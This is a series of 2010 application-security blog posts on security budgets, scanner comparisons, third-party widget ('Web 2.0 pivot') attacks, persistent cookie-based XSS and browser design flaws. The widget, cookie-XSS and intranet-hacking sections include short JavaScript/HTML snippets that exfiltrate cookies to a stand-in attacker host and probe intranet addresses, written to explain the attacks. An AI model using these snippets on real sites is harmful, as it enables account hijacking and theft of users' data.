Friday, February 19, 2010

Compliance and Habit holding back Application Security

My "Infrastructure vs. Application Security Spending" post must have struck a nerve. I've received a number of comments and emails where it's clear many are grappling with the same organizational budgeting challenges. Sharing these individual experiences help us raise awareness and gain new perspective on things that might work to our advantage. I sought permission to share the content of such insightful email from a Director of Product Security for a large publicly-traded company.

"Good post. It's something I've been preaching at *redacted* since day one. Our business relies on protecting our customers data. Why spend significantly more money on protecting our internal networks then on our product. I've won that battle, but given our security team started from network IT Security guys, that's where the money was spent.


A couple things I thought I'd pass along which you didn't mention, but I'm sure you've thought about:

1. Service providers are going to spend money where their customers want them to. If their customers' security teams are all network guys, then the service provider is catering its "security budget" to those guys. It still befuddles me in this day and age that we get predominantly more nCircle/Qualys/Nessus scans than we do application assessments from our customers. It shows in the compliance arena too…if the people auditing your company have been baptized by compliance, then the service provider will cater to that. Unfortunately there are way more auditors who look at compliance and network security than at application-level security.

2. I think the comparison of network/host security vs application security shouldn't equate (right now). Because of the maturity of the market, there are fewer tools that are practical to rely on. As such, the curve should focus more on people (training, processes, and security staff) than on tools. I'm not saying the tools can't/don't do a good job, I'm just saying that right now they're not sufficient and in general more staffing resources need to be involved. To use an internal example, the fact that all R&D staff at *redacted* go through security training, perform security work every sprint, use secure frameworks, tools, etc., isn't captured by the numbers…and frankly is more valuable than us spending another $100K on a few more licenses of AppScan or WebInspect.


I think it would be really interesting to compare the costs of some of these products vs the benefit they provide. I just find it terribly funny that a Burp license costs ~$200, while running a product like DB Monitoring would cost hundreds of thousands or even millions of dollars in a large data center. That said, customers ask for things like DB Monitoring - because, you know, the five DBAs are more likely to steal their data than the thousands of malicious hackers out there ;-)

I'm not old enough to know…but, I bet the network security guys cracked on how the physical security guys got all the budget way back when. Evolution…"


If you've got a story to share, please do!

Best of Application Security (Friday, Feb. 19)

Ten of the Application Security industry's coolest, most interesting, important, and entertaining links from the past week -- in no particular order.

Thursday, February 18, 2010

Hey Massachusetts, where is your application security requirement?

This relates to my last post, where Boaz Gelbord (Security Scoreboard) cited something very interesting about the Massachusetts data security regulation going into effect March 1. The “Computer System Security Requirements” listed under its "risk-based approach" are pasted below. While I can’t say any one of these security controls is a bad idea, can someone please tell me how any of this stuff is going to thwart Web-based attacks!? You know, the kind of attacks organizations and end-users are really dealing with!

No mention at all of (Web) application security, the thing we desperately need, but sure enough more firewalls, SSL, and anti-malware are legally mandated.


(1) Secure user authentication protocols including:
(a) control of user IDs and other identifiers;
(b) a reasonably secure method of assigning and selecting passwords, or use of unique identifier technologies, such as biometrics or token devices;
(c) control of data security passwords to ensure that such passwords are kept in a location and/or format that does not compromise the security of the data they protect;
(d) restricting access to active users and active user accounts only; and
(e) blocking access to user identification after multiple unsuccessful attempts to gain access or the limitation placed on access for the particular system;
(2) Secure access control measures that:
(a) restrict access to records and files containing personal information to those who need such information to perform their job duties; and
(b) assign unique identifications plus passwords, which are not vendor supplied default passwords, to each person with computer access, that are reasonably designed to maintain the integrity of the security of the access controls;
(3) Encryption of all transmitted records and files containing personal information that will travel across public networks, and encryption of all data containing personal information to be transmitted wirelessly.
(4) Reasonable monitoring of systems, for unauthorized use of or access to personal information;
(5) Encryption of all personal information stored on laptops or other portable devices;
(6) For files containing personal information on a system that is connected to the Internet, there must be reasonably up-to-date firewall protection and operating system security patches, reasonably designed to maintain the integrity of the personal information.
(7) Reasonably up-to-date versions of system security agent software which must include malware protection and reasonably up-to-date patches and virus definitions, or a version of such software that can still be supported with up-to-date patches and virus definitions, and is set to receive the most current security updates on a regular basis.
(8) Education and training of employees on the proper use of the computer security system and the importance of personal information security.

Infrastructure vs. Application Security Spending

A recent study published by 7Safe, the UK Security Breach Investigations Report, analyzed 62 cybercrime breach investigations and states that in “86% of all attacks, a weakness in a web interface was exploited” (vs 14% infrastructure) and the attackers were predominantly external (80%). These results are largely consistent with the US-based Verizon Data Breach Incident Report (2008), which tracks over 500 cases. Combine this knowledge with the targeted Web-related attacks against Google, Adobe, Yahoo, the US House of Representatives, TechCrunch, Twitter, Heartland Payment Systems, bank after bank, university after university, country after country -- the story is the same. It’s a Web security world.

It has been said before and it’s worth repeating, adding more firewalls, SSL, and the same ol’ anti-malware products is not going to help solve this problem!

The reason that Web security problems persist is not a lack of knowledgeable people (though we could use more), perfected security tools (they could be much better), or effective software development processes (still maturing). A fundamental reason is something I and others have been harping on for a long while now: organizations spend their IT security dollars protecting themselves from yesterday’s attacks, at the network/infrastructure layer, while overlooking today’s real threats. Furthermore, these dollars are typically spent counter to how businesses invest their resources in technology. To illustrate this point I’m going to borrow inspiration from Gunnar Peterson (Software Security Architect & CTO at Arctec Group).

Let’s look at the approximate 2009 revenue of the largest corporations supplying a significant (most?) portion of IT infrastructure: Cisco $36B, Juniper $3.3B, Microsoft $58.5B, and F5 $653M. Total: $98.5B (USD). To protect this infrastructure from attack, security products are purchased. The approximate 2009 revenue of the largest security vendors: Symantec $6B, Kaspersky $100M, McAfee $1.6B, Checkpoint $800M, SourceFire $75M, and IBM/ISS $500M (we think).

We’re spending $9.1B (USD) to protect $98.5B (USD) in infrastructure. Perhaps a ~10% security tax on infrastructure is acceptable.

Now, let’s take a look at five of the top Web-based companies, which make all their money online, and by extension whose core technology value is rooted in Web code. In 2009 their revenues were: Google $23.6B, Yahoo $6.5B, eBay $8.7B, Amazon $24.5B, Salesforce.com $1.1B -- $64.4B in total. Keep in mind that the 2009 eCommerce market is said to be about $130B. To protect these Web-enabled systems, let’s use Gary McGraw’s (CTO of Cigital) 2007 software security revenue number of $500 million. He takes into account the bulk of white and black box testing tools, professional services consultancies, and web application firewall vendors. Since Gary hasn’t updated his numbers yet, let’s adjust up to $750M to reflect market growth between then and 2009.

So in effect ~$750M is being spent to protect $64.4B in eCommerce revenue -- a security tax of roughly 1.2%.
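
As a quick sanity check on the arithmetic, here is a minimal sketch in plain JavaScript, using only the rounded figures cited above, that computes both security-tax ratios:

  // Back-of-the-envelope ratios using the rounded 2009 figures cited above.
  var infraRevenue = 98.5e9;       // Cisco + Juniper + Microsoft + F5
  var infraSecuritySpend = 9.1e9;  // Symantec, Kaspersky, McAfee, Checkpoint, SourceFire, IBM/ISS
  var webRevenue = 64.4e9;         // Google + Yahoo + eBay + Amazon + Salesforce.com
  var appSecuritySpend = 0.75e9;   // McGraw's 2007 estimate, adjusted upward

  var infraTax = infraSecuritySpend / infraRevenue * 100; // ~9.2%
  var appTax = appSecuritySpend / webRevenue * 100;       // ~1.2%
  console.log(infraTax.toFixed(1) + '% infrastructure security tax');
  console.log(appTax.toFixed(1) + '% application security tax');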


This is further supported by analyst findings. According to Gartner, 90 percent of IT security spending is on perimeter security such as firewalls. Plus, to my mind, that 1.2% figure is overly generous. The percentage is likely much lower because the $750M is actually spread out among the financial, healthcare, insurance, education, energy, transportation, and government verticals as well. Perhaps this is also the reason why so many application security professionals wage holy wars over which solution is the best, worst, most important, or should be purchased first.

For the last ten years, I’ve directly experienced application security professionals fighting amongst themselves for scraps off the Big-Security-Vendor’s table. Vulnerability scanners vs WAFs, black vs white box, pen-test vs source code review, certifications vs real world experience, developer training vs secure frameworks, and so on. FAIL! All these solutions are necessary and more! The only way I see to truly improve application security is for organizations to do one (or both) of the following:
  1. Reallocate a portion of current infrastructure security spend to application security.
  2. Grow overall IT security spending and increase application security to more than a rounding error.
But let’s say you are unconvinced by the numbers above. They might be too shaky; that’s fair. Let’s try another Gunnar-inspired exercise:

Break the IT budget into the following categories:

- Network: all the resources invested in Cisco, network admins, etc.
- Host: all the resources invested in Unix, Windows, sys admins, etc.
- Applications: all the resources invested in developers, CRM, ERP, etc.
- Data: all the resources invested in databases, DBAs, etc.

Tally up each layer. If you are like most businesses, you will probably find that you spend most on Applications, then Data, then Host, then Network.

Then do the same exercise for the Information Security budget:

- Network: all the resources invested in network firewalls, firewall admins, etc.
- Host: all the resources invested in Vulnerability management, patching, etc.
- Applications: all the resources invested in static analysis, black box scanning etc.
- Data: all the resources invested in database encryption, database monitoring, etc.

Again, tally up each layer. If you are like most businesses, you will find that you spend most on Network, then Host, then Applications, then Data. Congratulations, Information Security, you are diametrically opposed to the business!
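
If it helps, here is a rough sketch of the exercise in JavaScript. The dollar figures are hypothetical placeholders, not real budgets; substitute your own tallies.

  // Hypothetical budgets (in $M) -- substitute your own tallies.
  var itBudget = { Network: 2, Host: 4, Applications: 10, Data: 6 };
  var securityBudget = { Network: 3.0, Host: 1.5, Applications: 0.4, Data: 0.1 };

  // Order the layers of a budget from largest to smallest spend.
  function rank(budget) {
    return Object.keys(budget).sort(function (a, b) { return budget[b] - budget[a]; });
  }

  console.log('IT spend order:       ' + rank(itBudget).join(' > '));
  console.log('Security spend order: ' + rank(securityBudget).join(' > '));
  // If the two orderings come out (roughly) reversed, security spending is
  // misaligned with where the business actually invests.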


If security spending can be justified on areas where attacks no longer occur, then perhaps we can justify more time, money, and effort on application security in the areas where the attacks are being waged.

Tuesday, February 09, 2010

Where's WhiteHat? Re: Scanner Comparisons

Last week Larry Suto published, “Analyzing the Accuracy and Time Costs of Web Application Security Scanners,” which reviewed desktop black box website vulnerability scanners: Acunetix, IBM AppScan, BurpSuitePro, Cenzic Hailstorm, HP WebInspect, NTOSpider, and Qualys WAS (Software-as-a-Service). This research was meant to build upon Larry’s initial October 2007 study of the market. Several people have asked what I thought of the paper and why WhiteHat Security wasn’t covered. I’m happy to discuss both questions.

First off, the website vulnerability management space is in desperate need of side-by-side comparisons, as they are few and far between. This represents a challenge for organizations building application security programs that want to create a product short-list to evaluate internally. For a variety of reasons, independent and publicly available detailed technical reviews of website vulnerability management products/solutions are unlikely to come from the expected sources, such as trade magazines and industry analysts. One of the main inhibitors is that many of these firms do not have a Web application testbed that would allow for an accurate, fair comparison. Thankfully, researchers such as Larry Suto help fill the void by investing personal time and sharing their results. Other independents should be encouraged to do the same. I would recommend the “Web Application Security Scanner Evaluation Criteria (WASSEC)” if you wish to do so. Also, Larry confirmed he was not compensated by any vendor for his work.

During the latter stages of Larry’s research, WhiteHat Security was offered the opportunity to be included. In order to take part, we were asked to assess six vendor-hosted “test websites” with WhiteHat Sentinel, identify vulnerabilities, and report our findings. The testing process was designed to evaluate desktop black box scanner technology using a “Point-and-Shoot” and “Trained” methodology -- something not well-suited to a SaaS offering like Sentinel. What we do and how we do it is very different from the scanning tools, but it is still often seen as an alternative. After much consideration, we did not feel that the testing methodology would provide an apples-to-apples evaluation environment for Sentinel. Additionally, and equally important, finding vulnerabilities is only the first piece of the overall value our customers receive, so we politely declined to participate.

*Not to mention that, as a strict rule, we never touch any website without express written authorization.*

The report states, consistent with my expectations, that significant amounts of human/expert time are required for scanner configuration, vulnerability verification, scan monitoring, etc. to enable the aforementioned products to function proficiently. Behind the scenes, Sentinel is no different, except that we perform all of those activities and more for our customers as a standard part of the annual subscription. Doing so means our engineering time has a hard cost to us and staff resources are dedicated to serving customers.

The report confirms that scanner performance varies wildly from site to site, so it’s best to test where they will be deployed. We agree and provide mechanisms for our customers to evaluate Sentinel first-hand for exactly that reason. We want customers to know exactly what they can expect from us on their production systems, not on a generic test website. Finally, where Sentinel really excels is in areas where the report did not (could not) focus. Scalability is one of these. Whether we are tasked with one site, 10, 100, 1,000 or more -- Sentinel is capable of handling the volume.

Over the years I’ve written extensively about black box scanner efficiencies and deficiencies: Automated Scanners vs. Low-Hanging Fruit, Automated Scanner vs. The OWASP Top Ten, shedding light on duplication rates, what scanners are good at finding and what they are not -- with a scan-o-meter, business logic flaws, why crawling matters a lot, how much essential human time is required, and even what it takes to make the best scanner. So the scanners’ overall poor showing came as no surprise. Most missed nearly half of the vulnerabilities, on test websites no less, where vulnerabilities are designed to be easily found. Imagine how they would perform in the real world! It gets much uglier and more dangerous out there, I assure you.

I’d highly recommend that everyone interested in Web application security read Larry’s report for themselves and get familiar with the current state-of-the-art in black box scanning products. Much improvement could be made through additional R&D. Remember, keep an open mind, but at the same time take the results with a grain of salt until you test on your own systems. Some vendors will say Larry’s work wasn’t perfectly scientific, contained data errors, was misinterpreted, was run misconfigured, couldn’t be reproduced, etc. All of that may be true, but so is the fact that Larry appears to have conducted a deeper and fairer analysis than the average would-be user does during a typical evaluation.

Here are the three takeaways:
  1. Scanner results will vary wildly from website to website. For best results, I highly recommend that you evaluate them on the sites where they are going to be deployed. Better still, if you know of vulnerabilities in those sites ahead of time, use that information for comparison purposes.
  2. The significant human/expert time required for proper scanner set-up, ongoing configuration, vulnerability verification, etc. must be taken into consideration. Which vulnerabilities you scan for is just as important as how you scan for them. Estimate about 20-40 man-hours per website scanned.
  3. Scanner vendors should take into consideration that Larry Suto is certainly more sophisticated than the average user. So if he couldn’t figure out how to run your tool “properly,” take that as constructive feedback.

Thursday, February 04, 2010

Web 2.0 Pivot Attacks

Any penetration tester would agree that pivot attacks, designed to compromise a secondary host to more effectively attack primary targets, are incredibly powerful. Organizations tend to have difficulty protecting all hosts at all times, which is why proper network segmentation is vital should loss of control occur on any one node. Often it’s easier to compromise a host from behind rather than head on. Case in point, a hacker used a pivot attack to break into Heartland Payment Systems and pilfer 130 million CC#s: a SQL injection exploit was used to get a foothold in a non-payment-network host, leading to the eventual data compromise. Recently it occurred to me that pivot attacks exist in the Web 2.0 world as well; they are just not typically viewed that way.

Many websites automatically load content from remote resources (JavaScript, Flash, more HTML, images, etc.), which are hosted by third-party providers. These resources normally embed advertisements (DoubleClick), traffic counters (StatCounter), user trackers (whos.amung.us), games (Pogo), videos (YouTube), and thousands of other forms of dynamic content. These are often generically called “Web page widgets,” things website owners might want to include in their pages for their visitors. There are thousands, maybe tens of thousands, of these types of providers. Let’s look at some top mainstream media websites to see what widget hostnames they include:

TechCrunch
ad.doubleclick.net
ads.undertone.com
altfarm.mediaplex.com
b.scorecardresearch.com
bs.serving-sys.com
button.topsy.com
cdn.undertone.com
edge.quantserve.com
googleads.g.doubleclick.net
img.mediaplex.com
mp.apmebf.com
network.realmedia.com
partner.googleadservices.com
pubads.g.doubleclick.net
s0.2mdn.net
services.crunchboard.com
static.ak.connect.facebook.com
widget.startups.com
www.facebook.com
www.google-analytics.com
www.oracle.com
www.sun.com
www.tumri.net
ytaahg.vo.llnwd.net

NY Times
ad.doubleclick.net
admin.brightcove.com
ads.pointroll.com
at.amgdgt.com
brightcove.vo.llnwd.net
c.brightcove.com
googleads.g.doubleclick.net
graphics8.nytimes.com
load.tubemogul.com
markets.on.nytimes.com
receive.inplay.tubemogul.com
static.inplay.tubemogul.com
timespeople.nytimes.com
video2.nytimes.com
64.191.193.124

Wall Street Journal
ac3.msn.com
ad.doubleclick.net
adsyndication.msn.com
om.dowjoneson.com
online.wsj.com
s.wsj.net
www.marketwatch.com

CNN
ads.cnn.com
b.scorecardresearch.com
edition.cnn.com
i.cdn.turner.com
i.cnn.net
metrics.cnn.com
svcs.cnn.com

USA Today
ad.doubleclick.net
ads.adsonar.com
ads.revsci.net
altfarm.mediaplex.com
b.scorecardresearch.com
content.usatoday.com
gannett.gcion.com
i.usatoday.net
img-cdn.mediaplex.com
img.mediaplex.com
js.revsci.net
media.fastclick.net
mp.apmebf.com
optimized-by.rubiconproject.com
pix04.revsci.net
r1.ace.advertising.com
rd.apmebf.com
tap-cdn.rubiconproject.com
usata1.gcion.com
usatoday1.112.2o7.net

Washington Post
ad.bizo.com
ad.doubleclick.net
ads.adsonar.com
ads.bluelithium.com
ads.revsci.net
altfarm.mediaplex.com
bp.specificclick.net
custom.marketwatch.com
fls.doubleclick.net
js.revsci.net
media.washingtonpost.com
mp.apmebf.com


In a Web security context, these websites essentially allow arbitrary executable code, supplied by the third party, complete access to the browser DOM and the user’s session information (the exception being IMG SRC loads). That means they can hijack accounts by stealing authentication cookies; change the news or ask for passwords by altering what the user sees on the screen; redirect users to malware-laden websites; force browsers to attack other systems; and more. By including Web widgets from an uncontrolled source on your pages, you must include the third party’s entire infrastructure in your implicit trust model. These dangers have been previously discussed by Tom Stripling, where the third-party service provider was assumed to be the potentially nefarious source. I think the concern lies a bit deeper, which is where a malicious Web 2.0 pivot attack comes in.
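
To make the trust relationship concrete, here is an illustrative example of what a single externally hosted script include hands over. The hostnames are hypothetical.

  <!-- A typical widget include on a publisher's page (hostnames are hypothetical) -->
  <script src="http://widgets.third-party-example.com/tracker.js"></script>

  <!-- If that provider (or anyone who compromises it) serves the following
       instead, it runs with full access to the page's DOM and any cookies
       readable by script: -->
  <script>
  // Quietly ship the visitor's cookies off to an attacker-controlled host.
  new Image().src = 'http://evil.example.com/c?d=' + encodeURIComponent(document.cookie);
  // ...or rewrite the page content, redirect the user, attack the intranet, etc.
  </script>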

If a bad guy, whether APT or a less-skilled adversary, wants to surreptitiously compromise a (relatively) hardened Web presence (or its users), they don’t necessarily need to go after the target directly; they could instead go after the aforementioned third-party providers. How many of these third parties take security as seriously as their customers do? Presumably few, but we really don’t know for certain. (Please comment below if you have experiences here to share.) How many organizations really check up on a third party’s security posture, or even know enough to take this risk into consideration? Again, some do, but very few in my personal experience. An organization might dismiss the concern by saying something like:

"If X gets hacked we'll have bigger problems on our hands."

Important to add is that during a Web 2.0 pivot attack no traffic is directly seen by the primary target, which basically makes it impossible for them to detect or thwart the attack before a compromise. After a third-party compromise, it may be nearly as hard to detect a malicious Web widget code update unless you can somehow monitor the content for unexpected changes. This of course assumes the primary target knows how, when, or if the third party changes the code (rare). Not to mention that the inclusion of Web page widgets is almost always beyond the visibility of the security team, because the process is largely managed by marketing / product management (not so much application development) and can easily happen at any time with zero notice.
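
One (imperfect) countermeasure is to periodically fetch each third-party resource yourself and alert when its content changes. A minimal Node.js-style sketch, with a hypothetical URL and placeholder hash, might look like the following. Note it cannot catch a provider that serves malicious content only to selected visitors.

  // Poll a third-party widget and warn when its content changes unexpectedly.
  var https = require('https');
  var crypto = require('crypto');

  var WIDGET_URL = 'https://widgets.third-party-example.com/tracker.js'; // hypothetical
  var KNOWN_GOOD_SHA256 = 'hash-recorded-when-the-widget-was-last-reviewed'; // placeholder

  https.get(WIDGET_URL, function (res) {
    var body = '';
    res.on('data', function (chunk) { body += chunk; });
    res.on('end', function () {
      var hash = crypto.createHash('sha256').update(body).digest('hex');
      if (hash !== KNOWN_GOOD_SHA256) {
        console.warn('Widget content changed, new SHA-256: ' + hash + ' -- review before trusting.');
      }
    });
  });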

Pen-testers, to my knowledge, can’t/don’t use this type of pivot attack because the third party is usually another organization, unwilling to grant security testing authority, and therefore out of the scope of the engagement. Also important is that in a network pivot attack you may still be limited in what you can do on a host due to network segregation, ACLs, etc., but in JavaScript space you are basically God.

Yes, the HTML 5 sandbox would be really nice to have.

Converting unimplementable Cookie-based XSS to a persistent attack

Update: Related work by Mike Bailey, Cross-subdomain Cookie Attacks: [Screenshot 1 & 2]

If you spend enough time looking for Cross-Site Scripting (XSS) vulnerabilities, you are bound to come across a cookie-based version eventually -- where the script injection is located in the Cookie header. The problem is there’s no good way (in a modern browser) to force a victim’s browser to send an HTTP request with a modified Cookie value (to include HTML/JS). While the website or Web application is still technically vulnerable to XSS, this is usually considered unimplementable since no PoC code can be created, and the risk/threat rating is therefore lowered.

I was having this conversation with Rob Tate, a member of WhiteHat’s Engineering team, who enlightened me to something I hadn’t previously considered. Cookie-based XSS can be made very useful after all!

Consider an online bank with an XSS through a username Cookie parameter. After a successful login, the resulting page reads something like "Hello <username>." with the cookie value echoed into the page unencoded:

Cookie: username=<script>…</script>

Setting the Cookie will most likely require another (non-persistent) XSS vulnerability, which as we know is extremely common. By combining these two vulnerabilities, the unimplementable cookie-based XSS and an ordinary non-persistent XSS, you could create a persistent XSS scenario.

What the attacker could do is use the non-persistent XSS to inject a data-mining JavaScript function into the browser’s username Cookie parameter via document.cookie. Afterwards, every time the victim logs in, the JavaScript will execute in the DOM. Now you have a persistent XSS attack that sticks with the browser over multiple sessions.
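
A rough sketch of the two-step attack follows; the parameter name, payload, and expiry date are purely illustrative.

  // Step 1: a reflected (non-persistent) XSS on the vulnerable site runs this
  // once, planting script in the long-lived "username" cookie.
  document.cookie = 'username=<script src="http://evil.example.com/hook.js"><\/script>' +
                    '; path=/; expires=Fri, 31 Dec 2010 23:59:59 GMT';

  // Step 2: on every subsequent login, the application echoes the cookie value
  // into its "Hello <username>" greeting without encoding it, so the injected
  // script executes again -- effectively persistent XSS that survives across
  // sessions until the cookie is cleared or expires.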

Wednesday, February 03, 2010

The Web won’t be safe, let alone secure, unless we break it

There are several security issues affecting all major Web browsers that have remained unaddressed for years (probably because the bad guys haven’t leveraged them aggressively enough, but the potential is there). The problem is that the only known way to fix these issues (adequately) is to “break the Web” -- i.e. negatively impact the usability of a significant and unacceptable percentage of websites. Doing so is a nonstarter for any browser vendor looking to grow market share. The choice is clear for most vendors: be less secure and widely adopted, rather than secure and obscure. This is a topic deserving of further exploration.

Web security can be divided into two parts: website security and Web browser security. Both are equally important. A website must be able to protect itself from a hostile browser, and a browser must be able to protect itself from a hostile website. If either side of these assumptions fails, then there is a problem (the Web is not secure). Attacks targeting browsers, which will be the focus of this post, can be broadly categorized into three distinct vectors:

1) Attacks designed to escape the confines of the browser walls and execute within the desktop operating system below. This is primarily achieved by exploiting memory and file-handling implementation flaws.

2) Behavioral attacks that trick users into doing something harmful, such as downloading and installing malware or revealing sensitive information.

3) Attacks taking advantage of design flaws in the way the Web works. These attacks normally remain within the browser walls and use the victim’s browser as a launch platform for surreptitiously pilfering information from their session or the surrounding network.

After years of massive volumes of CVEs (the repository of published vulnerabilities), the browser vendor incumbents (Microsoft, Mozilla, Opera, Google, Apple) have made great strides in addressing vector #1. Some have more work to do than others. This is a good thing, as exploiting unpatched browsers is the primary method for malware propagation, such as the so-called drive-by-downloads: legitimate websites hosting malware that infects their visitors. Fortunately, “fixing” #1 doesn’t require “breaking the Web,” only fixing shoddy code and distributing updates.

Solving #2 is more psychological than technical in nature. The challenge is that people trust computer screens, believe what they see on the Web, and will install anything in order to watch the latest celebrity sex tape or open a personalized e-greeting sent by their “friend.” Attackers prey on this inherent trust, general good nature, and basic human instinct. In response, browsers have provided EV-SSL, Anti-Phishing Toolbars, SSL warning dialogs, password managers, etc. These efforts make important security decisions more visible, harder to get wrong, or remove the decision altogether. Again “fixing” these issues doesn’t require “breaking the Web,” but creating a more intuitive user-interface design.

Addressing #3, with roots dating back to the earliest days of the Web, is another matter entirely. Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Clickjacking, CSS History Stealing, Intranet Hacking, etc. are all good examples. While these weren’t pressing issues before, they are trending in a dangerous direction. We’ve seen outbreaks of Twitter worms, XSS defacements of government websites, Facebook Clickjacking attacks, sites that disclose which porn sites people visit, several Intranet Hacking proof-of-concept tools, and so on.

Many, including myself, have asked the major browser vendors to do something about CSS History Hacking -- a privacy violation where a malicious website can tell whether you’ve been to a certain URL -- for example by disabling access to the relevant DOM APIs. They said doing so would break certain websites and upset Web developers. (Update: See Wladimir's comment below for excellent insight into the true difficulty of solving this problem)

To solve Intranet Hacking, the suggestion was made to deny websites with a non-RFC 1918 IP address the ability to passively instruct a browser to connect to RFC 1918 IP addresses. The response was that it would break certain essential features like corporate Web proxy set-ups and add-ons like Google Desktop.
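
For example, nothing stops a page served from a public IP address from doing something like the following. The addresses, paths, and the recordHit/recordMiss handlers are all hypothetical.

  <!-- A public Web page quietly making the visitor's browser probe RFC 1918
       address space from inside their own network perimeter. -->
  <img src="http://192.168.1.1/images/logo.gif"
       onload="recordHit('192.168.1.1')"
       onerror="recordMiss('192.168.1.1')">
  <script src="http://10.0.0.5/admin/config.js"></script>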

Fixing Clickjacking would require changing the IFRAME implementation so that frames could not be transparent, or not allowing them at all. Doing so would undoubtedly cause major Web breakage, such as no banner advertising or Facebook-style application platforms. So instead we get the opt-in X-FRAME-OPTIONS header, which basically no one uses at the moment.
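
For reference, the opt-in protection is a single response header that instructs supporting browsers not to render the page inside a frame:

  X-Frame-Options: DENY        (never allow the page to be framed)
  X-Frame-Options: SAMEORIGIN  (allow framing only by pages from the same origin)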

Maybe browser tab/session separation is in order. When logged in to a website in one tab, other tabs wouldn’t have session access, thereby limiting the damage XSS, CSRF, and Clickjacking could inflict. But this solution would probably annoy users and Web developers who really want persistent authentication. Oh, and we really need Web tracking cookies too. Gah!

So here we are, waiting for the other shoe to drop and for bad enough things to happen. Then we’ll get the juice required to fix these problems by default. The bigger problem is that when that time eventually comes, we might actually be forced to break the Web to secure it. In the meantime, the community has been lobbying hard for opt-in tools that the proactive crowd can use to protect themselves ahead of time. Fortunately, we are starting to see new technologies like XSSFilter, Content Security Policy, Strict Transport Security, and Origin headers come into view. Maybe this is the future and a look into the security proving ground for the changes we’ll need to make later.
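
Strict Transport Security, for instance, is nothing more than an opt-in response header telling supporting browsers to refuse plain-HTTP connections to the site for a set period. The directive syntax shown below follows the draft specification and may differ slightly from what individual browsers shipped at the time:

  Strict-Transport-Security: max-age=31536000; includeSubDomains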

Tuesday, February 02, 2010

Be Ready -- With Answers

Where are most reported security vulnerabilities located? In Web applications. How is malware predominantly distributed and how are end-users infected? By visiting legitimate websites that have been hacked and loaded with drive-by-download browser exploits. What were the main attack vectors used in the Aurora attacks affecting Google, Adobe, Yahoo and many others? Targeted reconnaissance using social networks, plus Web browser exploits. What type of cyber attack recently targeted 49 US House of Representatives members just after President Obama’s State of the Union Address? Website defacement. Popular blog TechCrunch received similar treatment, twice, and just before Apple’s recent iPad announcement. What was the main attack vector used in the largest credit card breach ever, affecting Heartland Payment Systems? SQL Injection of a Web application.

Let’s also not forget that according to Verizon’s Data Breach Incident Report (DBIR), “SQL injection attacks, cross-site scripting, authentication bypass and exploitation of session variables contributed to nearly half of the cases investigated that involved hacking.”

Obviously today’s threat landscape is focused on the Web, not on networks as in years past. We are now seeing larger, more high-profile, costly, and embarrassing events with increased regularity. But make no mistake, this is just the beginning of what’s to come. The trends are easy to read: Web attacks will get worse, far worse, and far more common. Sure there have been some lawsuits and fines, but no one has gone out of business, suffered a significant stock drop, or lost their life as a result of a Web security incident. The fact is everyone can still get their webmail, update their Facebook, post to Twitter, check their online bank account balance, and buy a book on Amazon -- all still relatively safely. Enjoy this moment; the age of application security innocence is nearly over.

Web security, application security, software security, or whatever you want to call it will soon come into its own. It will no longer be acceptable, feasible, or even a serious suggestion to run for cover by simply adding more firewalls and SSL. Things like “the cloud” will help make this failure plain as day. For application security professionals working in this field, struggling to get their concerns taken seriously by the business, rest assured that very soon the business will be coming to you rather than the other way around. They’ll want answers, nay solutions, and will come with a checkbook in hand, ready to make the problem go away. When they come to you with this urgency it will be as a result of a serious breach, customer revolt, vendor compromise, exposure of the organization’s crown jewels, etc. -- issues that directly affect the bottom line and the ability to transact business.

It would be nice to proactively head off the coming catastrophes, but unfortunately the information security industry doesn’t really work that way. Businesses have a hard time spending ahead of an incident. Really bad things have to happen before the allocation of resources can be justified. At least, that is how it has always worked. So today your job is to prepare -- and have the answers ready when asked. Here is how:

1) Make yourself visible
Brand yourself, and/or your team, as the go-to internal expert(s) for “application security.” Regularly share interesting links, summarize interesting white papers, and offer to coordinate workshops for management and development teams so they can get up to speed. If you need content, every Friday I publish a “Best of Application Security” feature on my blog. Of course, continue voicing concerns about present risks, even if it means being ignored and overruled when suggesting proactive application security programs. The side effect is that this will help establish your organizational visibility. And you won’t be ignored for long given the coming threats. These recent blog posts can help hone your arguments: “Budgeting for Web Application Security” and “Overcoming Objections to an Application Security Program.”

2) Have your answers ready
Build your internal step-by-step plan for an application security program. Need help getting started? Look no further than Securosis’s “Web Application Security Program” white paper. Take its guidance and adapt it to your organization’s specific needs, so that when a plan is asked for you are not caught flat-footed. Few things say more about a security professional than their readiness, especially in the eyes of management.

3) Engage with the community
OWASP, WASC, SANS, MITRE, etc. -- pick your group and a project to get involved in. Meet people, ask questions, and help out as best you can. No one can be expected to have all the answers to every Web security question, the knowledge base is far too big, so build up your network of contacts so you can ask peers. Remember, this is a two-way street: you get what you give.